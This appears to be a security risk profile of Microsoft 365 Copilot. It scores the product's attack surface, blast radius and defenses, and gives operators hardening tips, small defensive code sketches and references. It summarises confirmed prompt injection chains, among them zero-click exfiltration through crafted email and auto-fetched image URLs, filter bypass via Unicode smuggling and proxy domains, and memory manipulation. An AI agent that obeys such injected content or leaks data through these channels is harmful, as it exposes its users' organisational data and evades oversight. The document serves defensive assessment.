1 Key Risks
The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Confirmed zero-click prompt injection chains expose the full organizational data estate through credential-equivalent access, with no effective output guardrails or monitoring in the default configuration.
2 AIRQ Scores
The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Confirmed exploitation chains against partial defenses produce a moderate composite score anchored by credential-equivalent blast radius and bypassable input filtering.
Operators deploying this agent inherit confirmed data exfiltration paths that reach the full organizational data estate despite partial input filtering, placing the risk profile where attack capability outpaces defense maturity.
The four metrics below capture the gap between the agent's broad data access and its incomplete default-on protection against confirmed attack patterns.
| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 4.56 | Moderate composite risk driven by confirmed exploitation against partially defended credential-equivalent access. |
| Blast Radius | 5.38 / 10 | File system, network, and credential factors score highest (3 / 4 each), reflecting full organizational data inheritance. |
| Attack Surface | 5.72 / 10 | Three surfaces at adjusted ceiling from confirmed zero-click injection and data exfiltration vulnerabilities. |
| Defense Controls | 5 / 15 | Input filtering and execution isolation partially present; output guardrails confirmed bypassable against targeted evasion. |
3 Attack Surface
Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. Three attack surfaces reach the adjusted ceiling, driven by confirmed zero-click prompt injection and auto-fetch exfiltration chains that bypassed deployed input and output filters.
Scores reflect base architectural exposure (out of 4) plus evidence penalties from confirmed agent-specific vulnerabilities and demonstrated exploitation research, which is why surfaces with confirmed exploitation can show 5 / 4.
Each row measures how attacker-controlled input reaches the reasoning loop through that channel, with penalties applied where confirmed exploitation exists.
| Surface | Score | Comments |
|---|---|---|
| User Input | 5 / 4 | Direct prompt channel accepts arbitrary text; indirect injection via crafted email demonstrated zero-click bypass of cross-prompt injection filters [1]. A separate validation flaw confirmed unauthorized network-based information disclosure without authentication [2]. Both vulnerabilities received critical severity ratings and were patched server-side. |
| External Data | 5 / 4 | Retrieval-augmented generation ingests email, documents, and web content from organizational storage without per-item validation. Confirmed exploitation demonstrated that attacker-controlled email content triggers automatic tool invocation [6] and data staging without user interaction [1] [5]. The grounding pipeline processes external content identically to trusted internal documents. |
| Memory | 3 / 4 | Declarative memory stores durable facts across sessions. Confirmed exploitation demonstrated that prompt injection can add and delete memory entries [3] [7], enabling persistent influence over future responses. The attack chain showed how manipulated memory enables long-term data exfiltration through CSS-based side channels. |
| Reasoning | 2 / 4 | The reasoning layer operates on mixed trusted and untrusted context without documented separation between system instructions and grounded content [9]. No public red-team of reasoning-layer isolation has been published. The base exposure reflects standard LLM context-mixing risk without confirmed agent-specific exploitation. |
| Planning | 1 / 4 | Single-turn interaction model without multi-step autonomous planning in the default configuration [9]. The agent does not decompose tasks into sub-goals or execute multi-step chains without explicit user direction, limiting the planning surface to direct request-response cycles. |
| Tool Execution | 1 / 4 | Tools are limited to organizational API calls scoped to existing user permissions [9]. No shell, browser, or code execution sandbox is exposed in the default configuration. The constrained tool surface restricts exploitation to data access rather than arbitrary code execution. |
| Orchestration | 2 / 4 | Internal orchestration coordinates retrieval, grounding, and response generation across organizational API endpoints [10]. The orchestration layer is not operator-configurable and runs within vendor-hosted infrastructure, limiting attacker manipulation to indirect influence through grounded content. |
| Inter-Agent | 2 / 4 | The agent connects to plugins and third-party connectors that extend its action surface [15]. Plugin interactions inherit the user's authentication context without additional per-plugin consent gates. Independent research demonstrated that these connections enable remote execution chains triggered by email [8]. |
| Output Processing | 5 / 4 | Markdown rendering with auto-fetched image URLs enables side-channel exfiltration [16]. A confirmed exploit [1] bypassed link redaction through Unicode manipulation and proxy domain routing. A separate vulnerability [4] confirmed information disclosure through improper neutralization of output consumed by downstream components. |
| Configuration | 2 / 4 | Tenant administrators control availability and data access policies through a centralized admin center [9]. Individual user-level security configuration is limited; default permissions inherit the user's full organizational API scope without per-resource restriction. |
The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session: the three conditions that turn an isolated prompt injection into full-chain exfiltration. This agent processes attacker-controlled email and document content, accesses the authenticated user's full organizational data estate including files and credentials, and transmits bytes externally through auto-fetched URLs and plugin HTTP calls in its default configuration.
Microsoft 365 Copilot exhibits all three of these conditions in its documented default configuration:
- Untrusted input (confirmed): attacker-controlled email content triggers processing without user interaction, as demonstrated by the zero-click indirect prompt injection chain that bypassed deployed cross-prompt injection filters [1].
- Sensitive data (confirmed): the agent accesses the full organizational data estate through the authenticated user's permission scope, including email, files, calendar, and credentials, without per-resource classification gates on grounding [9].
- External egress (confirmed): auto-fetched markdown image URLs and plugin HTTP calls transmit bytes outside the operator's trust boundary, as demonstrated by data exfiltration to an attacker-controlled server through a proxy domain [1].
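The three-condition test above can be written as a simple predicate. The following is a minimal sketch, not part of the scoring methodology; the class and field names are hypothetical and chosen only for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SessionCapabilities:
    """Hypothetical summary of what one agent session can do."""
    processes_untrusted_content: bool   # e.g. inbound email, shared documents
    accesses_private_data: bool         # e.g. mailbox, files, calendar
    communicates_externally: bool       # e.g. auto-fetched URLs, plugin HTTP calls


def lethal_trifecta(caps: SessionCapabilities) -> bool:
    """True only when all three conditions hold in the same session."""
    return (
        caps.processes_untrusted_content
        and caps.accesses_private_data
        and caps.communicates_externally
    )


# Default configuration as described in this profile.
default_profile = SessionCapabilities(True, True, True)
# Same agent with external egress blocked (an illustrative hardening outcome).
egress_blocked = SessionCapabilities(True, True, False)

print(lethal_trifecta(default_profile))  # True
print(lethal_trifecta(egress_blocked))   # False
```

Removing any single condition breaks the chain, which is why several of the hardening tips later in the profile target egress rather than trying to filter every input.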
4 Blast Radius
The blast radius is what an attacker who controls the agent can reach: which systems they touch, which credentials they read, and which actions they take without operator approval. File system, network, and credential access score highest (3 / 4 each), reflecting that compromise of the agent's reasoning grants access equivalent to the authenticated user's full organizational permissions.
Scores reflect the damage an attacker achieves after successfully injecting into the agent's context, measured by the resources reachable from that position.
Each factor measures the scope of organizational resources an attacker can reach or exfiltrate through a successfully compromised agent session.
| Factor | Score | Comments |
|---|---|---|
| Code execution | 1 / 4 | No code execution sandbox exposed in the default configuration [9]. The agent generates text responses and invokes organizational API calls but does not execute arbitrary code, limiting post-compromise actions to data access and messaging. |
| File system access | 3 / 4 | Full read access to organizational file storage within the user's permission scope. Confirmed exploitation [1] demonstrated exfiltration of internal document content through the auto-fetch side channel without additional authentication or user approval. |
| Network access | 3 / 4 | Outbound network access through auto-fetched image URLs and plugin HTTP calls [14]. Confirmed exploitation [1] demonstrated data transmission to an external server through a proxy domain that bypassed content security policy restrictions in the default configuration. |
| Credential access | 3 / 4 | The agent operates with the authenticated user's full OAuth token, granting access equivalent to the user's own credentials across email, files, calendar, and messaging [13]. Confirmed exploitation [1] accessed content through these delegated scopes without re-authentication. |
| Autonomous action | 2 / 4 | The agent can draft messages, create events, and modify files within the user's scope [6]. Actions that send outbound communications require user confirmation in the default configuration, though indirect prompt injection via malicious email demonstrated automatic tool invocation bypassing this gate. |
| Deployment access | 1 / 4 | No deployment, infrastructure management, or CI/CD capabilities in the default configuration [9]. The agent operates within the productivity boundary without access to resource management or code deployment pipelines. |
5 Defense Controls
Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Input filtering is deployed but confirmed bypassable, execution isolation is documented but not independently audited, and output guardrails and monitoring provide nothing effective against demonstrated attack vectors.
Scores reflect what the default configuration provides without operator customization, using an inverted scale where higher values indicate stronger protection.
Each component measures whether a specific defensive control operates by default and whether confirmed exploitation has demonstrated its bypass.
| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 2 / 3 | Prompt Shields and cross-prompt injection classifiers are deployed as default-on input filters [10]. However, confirmed exploitation [1] demonstrated complete bypass through Unicode manipulation, indicating the control exists but fails against targeted evasion by a motivated attacker with knowledge of the filter architecture. |
| Execution Isolation | 2 / 3 | Server-side hosted execution with tenant-scoped compute isolation is documented in vendor architecture materials [9] [11]. No public third-party audit of the isolation boundary exists, and the operator cannot configure sandbox parameters or inspect execution logs for the grounding pipeline. |
| Action Controls | 1 / 3 | Send-action confirmation gates exist for outbound email in the default configuration. Independent research [6] demonstrated tool invocation and data staging without user approval through indirect prompt injection, indicating the control is partially bypassable. |
| Output Guardrails | 0 / 3 | Link redaction is intended to prevent data exfiltration via URLs in responses. The EchoLeak chain [1] defeated this control entirely through Unicode obfuscation and proxy domain routing, proving no effective default-on output sanitization exists against targeted evasion vectors. |
| Monitoring | 0 / 3 | Purview Unified Audit Log captures interactions for compliance review. No documented default-on anomaly detection for prompt injection patterns or data exfiltration attempts within sessions exists [12]. Operators must configure SIEM integration and alerting rules manually. |
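
The headline Defense Controls figure of 5 / 15 is consistent with a plain sum of the five component scores in the table above. The profile does not state the aggregation formula, so the snippet below is a check under that assumption rather than the official calculation.

```python
# Component scores copied from the Defense Controls table (each out of 3).
defense_components = {
    "Input Guardrails": 2,
    "Execution Isolation": 2,
    "Action Controls": 1,
    "Output Guardrails": 0,
    "Monitoring": 0,
}
MAX_PER_COMPONENT = 3

# Assumption: the headline score is the unweighted sum of the components.
total = sum(defense_components.values())
ceiling = MAX_PER_COMPONENT * len(defense_components)
print(f"{total} / {ceiling}")  # 5 / 15
```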
6 Hardening Tips
Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators can materially reduce the confirmed exploitation surface by restricting data access scope, enforcing output controls, and enabling detection capabilities that are available but not active by default.
Input Guardrails
Input guardrails intercept adversarial content before it reaches the reasoning loop.
- Policy: Restrict agent access to sensitivity-labeled content using information protection policies, preventing grounding on documents above a configured classification tier. Counters the unrestricted retrieval-augmented generation that enabled organizational data exfiltration.
- Configuration: Deploy data loss prevention policies scoped to the agent location to block responses grounded on content matching sensitive information types defined by the organization. Counters the absence of per-item classification gates on ingested content.
- Engineering: Implement conditional access policies requiring compliant devices and named locations for agent access, reducing the attack surface for credential-based injection delivery. Counters the zero-click email delivery vector demonstrated in confirmed exploitation.
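
The idea behind the first tip above, capping grounding at a classification tier, can be sketched as a filter over candidate documents. This is an illustration only: the tier names, the `label` field, and the `groundable` helper are hypothetical and do not represent any vendor API or policy syntax.

```python
from enum import IntEnum


class Sensitivity(IntEnum):
    """Hypothetical label tiers, ordered from least to most sensitive."""
    PUBLIC = 0
    GENERAL = 1
    CONFIDENTIAL = 2
    HIGHLY_CONFIDENTIAL = 3


def groundable(documents, max_tier):
    """Keep only documents at or below max_tier.

    Unlabeled documents are treated as the most sensitive tier (fail closed).
    """
    return [
        doc for doc in documents
        if doc.get("label", Sensitivity.HIGHLY_CONFIDENTIAL) <= max_tier
    ]


candidates = [
    {"name": "lunch-menu.docx", "label": Sensitivity.PUBLIC},
    {"name": "roadmap.pptx", "label": Sensitivity.CONFIDENTIAL},
    {"name": "untitled.xlsx"},  # no label
]
allowed = groundable(candidates, Sensitivity.GENERAL)
print([doc["name"] for doc in allowed])  # ['lunch-menu.docx']
```

Failing closed on unlabeled content is a design choice in this sketch; an operator with a large unlabeled estate may prefer to label first and enforce afterwards.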
Execution Isolation
Execution isolation contains what a compromised agent can do on the host.
- Policy: Scope agent licensing to security groups with minimum-necessary organizational API permissions rather than deploying organization-wide. Counters the full permission inheritance that grants credential-equivalent access to every licensed user.
- Configuration: Enable audit log forwarding to a SIEM with alerts on anomalous interaction patterns, including high-volume file access and unusual time-of-day usage. Counters the absence of default-on execution monitoring for injection indicators.
- Engineering: Review and restrict third-party plugin deployments through integrated apps management controls. Counters the extended action surface from unvetted connectors that inherit the user's authentication context.
Action Controls
Action controls govern which tools and actions the agent can invoke autonomously.
- Policy: Disable agent email-send capabilities for users who do not require AI-assisted outbound communication through transport rule enforcement. Counters the demonstrated tool invocation bypass that stages exfiltration via message drafts.
- Configuration: Restrict agent file-write permissions using site-level access policies limiting which document libraries the agent can modify. Counters the autonomous file modification capability within the user's full organizational scope.
- Engineering: Deploy cloud application session policies that block agent-initiated downloads of documents matching data loss prevention patterns. Counters the file system blast radius from credential-equivalent organizational API access.
Output Guardrails
Output guardrails inspect what the agent sends to other systems and users.
- Policy: Configure content safety policies to restrict agent rendering of external URLs and image content in responses. Counters the auto-fetch exfiltration channel exploited through the confirmed zero-click attack chain.
- Configuration: Deploy network-layer URL filtering blocking outbound requests to non-allowlisted domains from service endpoints. Counters the proxy domain exfiltration path that bypassed content security policy restrictions.
- Engineering: Enable communication compliance policies monitoring agent output for patterns matching known exfiltration encodings, including Unicode smuggling and encoded data in URLs. Counters the ASCII smuggling staging technique demonstrated by independent researchers.
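
To make the output-side controls above concrete, the sketch below shows one way a rendering layer could strip invisible Unicode characters and drop markdown images hosted outside an allowlist. It is an assumption-laden illustration, not the vendor's link redaction logic: the function names and the `assets.example.com` host are hypothetical, and the regular expression covers inline image syntax only, so reference-style images would need a real markdown parser.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Invisible code points that can hide payloads: the Unicode Tags block
# (U+E0000 to U+E007F) plus common zero-width characters.
_INVISIBLE = re.compile("[\U000E0000-\U000E007F\u200b\u200c\u200d\u2060\ufeff]")
# Inline markdown images only: ![alt](url "optional title")
_INLINE_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def _host(url: str) -> str:
    """Lower-cased hostname, or '' when the URL has none or cannot be parsed."""
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


def sanitize_markdown(text: str, allowed_hosts: set) -> str:
    """Remove invisible characters, then drop images hosted off the allowlist."""
    text = _INVISIBLE.sub("", text)
    # NFKC folds look-alike forms (e.g. fullwidth letters) before host checks.
    text = unicodedata.normalize("NFKC", text)

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        if _host(url) in allowed_hosts:
            return match.group(0)
        return f"[image removed: {alt}]"

    return _INLINE_IMAGE.sub(_replace, text)


allowlist = {"assets.example.com"}  # hypothetical trusted image host
response = "See ![chart](https://evil.example/p.png?d=secret) now"
print(sanitize_markdown(response, allowlist))
# See [image removed: chart] now
```

An exact-match host allowlist is deliberately strict. The proxy-domain bypass described in this profile suggests that allowlisting a broad trusted domain can reopen the channel if that domain can forward requests elsewhere.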
Monitoring
Monitoring captures what the agent did and surfaces anomalies for review.
- Policy: Forward unified audit log agent events to a SIEM with correlation rules detecting injection indicators, including repeated grounding failures and high-frequency file access within single sessions. Counters the absent default anomaly detection.
- Configuration: Deploy analytics rules specifically targeting agent interaction anomalies using dedicated telemetry tables. Counters the operator blind spot on real-time injection detection within legitimate user sessions.
- Engineering: Enable insider risk management signals for agent sessions exhibiting data exfiltration patterns, including sequential access to classified documents followed by outbound communication. Counters the gap between compliance logging and active threat detection.
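
One of the correlation rules named above, high-frequency file access within a single session, can be prototyped offline before it is expressed in a SIEM query language. The sketch below assumes audit events have already been exported as dictionaries; the field names (`session_id`, `timestamp`, `file_id`) and the thresholds are hypothetical and do not reflect the actual audit log schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def flag_bursty_sessions(events, max_files=20, window=timedelta(minutes=5)):
    """Return IDs of sessions touching more than max_files distinct files
    within any sliding time window of the given length."""
    by_session = defaultdict(list)
    for event in events:
        by_session[event["session_id"]].append(
            (event["timestamp"], event["file_id"])
        )

    flagged = set()
    for session_id, accesses in by_session.items():
        accesses.sort()  # chronological order
        start = 0
        for end in range(len(accesses)):
            # Shrink the window until it spans at most `window` of time.
            while accesses[end][0] - accesses[start][0] > window:
                start += 1
            distinct = {file_id for _, file_id in accesses[start:end + 1]}
            if len(distinct) > max_files:
                flagged.add(session_id)
                break
    return flagged


base = datetime(2025, 1, 1, 9, 0, 0)
# Session s1 reads 25 different files in 25 seconds; s2 reads 3 over 20 minutes.
events = [
    {"session_id": "s1", "timestamp": base + timedelta(seconds=i), "file_id": f"doc-{i}"}
    for i in range(25)
]
events += [
    {"session_id": "s2", "timestamp": base + timedelta(minutes=10 * i), "file_id": f"doc-{i}"}
    for i in range(3)
]
print(flag_bursty_sessions(events))  # {'s1'}
```

The threshold of 20 files in 5 minutes is a placeholder; a sensible value depends on baseline usage in the tenant and should be tuned against historical logs.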
7 References
The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.
Selected Vulnerabilities
- [1] CVE-2025-32711: EchoLeak zero-click prompt injection in M365 Copilot (CVSS 9.3). Crafted email triggered data exfiltration via auto-fetched image URLs, bypassing XPIA filters. Patched server-side May 2025.
- [2] CVE-2026-24307: Improper input validation in M365 Copilot (CVSS 9.3). An unauthorized attacker could disclose information over the network without authentication. Patched server-side January 2026.
- [3] CVE-2026-24299: Command injection in M365 Copilot (CVSS 5.3). Demonstrated at DEF CON as Copirate 365, including memory manipulation and persistent data exfiltration. Patched March 2026.
- [4] CVE-2026-26129: Critical information disclosure in M365 Copilot Business Chat via improper neutralization of output used by a downstream component (CVSS 7.5). Patched May 2026.
Selected Research
- [5] EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit. Aim Security research demonstrating the full EchoLeak attack chain against M365 Copilot, including XPIA bypass and auto-fetch exfiltration.
- [6] Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information. Rehberger demonstrated prompt injection via malicious email triggering automatic tool invocation and ASCII smuggling for data exfiltration.
- [7] Copirate 365 at DEF CON. DEF CON Singapore presentation demonstrating memory manipulation, CSS-based data exfiltration, and persistent theft chains in M365 Copilot.
- [8] Living off Microsoft Copilot. Bargury demonstrated remote Copilot execution via email-triggered search, exfiltration, and DLP bypass using the LOLCopilot offensive toolset at Black Hat USA 2024.
Vendor Documentation
- [9] Security for Microsoft 365 Copilot. Primary vendor security documentation describing identity controls, tenant isolation, data governance, and Entra ID integration architecture.
- [10] How Microsoft defends against indirect prompt injection attacks. MSRC blog describing Prompt Shields, TaskTracker internal-state analysis, FIDES information-flow control, and the LLMail-Inject challenge.
- [11] Data Privacy and Security for Microsoft 365 Copilot. Documents the permissions model, prompt injection blocking, encryption at rest and in transit, and compliance commitments.
- [12] Microsoft Purview DLP for Microsoft 365 Copilot. Documents how DLP policies can block Copilot from responding or grounding when prompts contain sensitive information types.
Other Sources
- [13] Critical Microsoft 365 Copilot Vulnerabilities Expose Sensitive Information. Security news coverage of the May 2026 triple-CVE disclosure documenting critical information disclosure vulnerabilities patched server-side.
- [14] EchoLeak AI Attack Enabled Theft of Sensitive Data via Microsoft 365 Copilot. SecurityWeek coverage providing operator-facing analysis of the CVE-2025-32711 disclosure, including attack mechanics and scoped data access.
- [15] How to Weaponize Microsoft Copilot for Cyberattackers. Dark Reading coverage of Black Hat USA 2024 LOLCopilot demonstrations, including remote Copilot execution and post-compromise spear-phishing.
- [16] EchoLeak: A Reminder That AI Agent Risks Are Here to Stay. Zenity Labs analysis connecting EchoLeak to the broader M365 Copilot attack surface and explaining why underlying injection issues persist.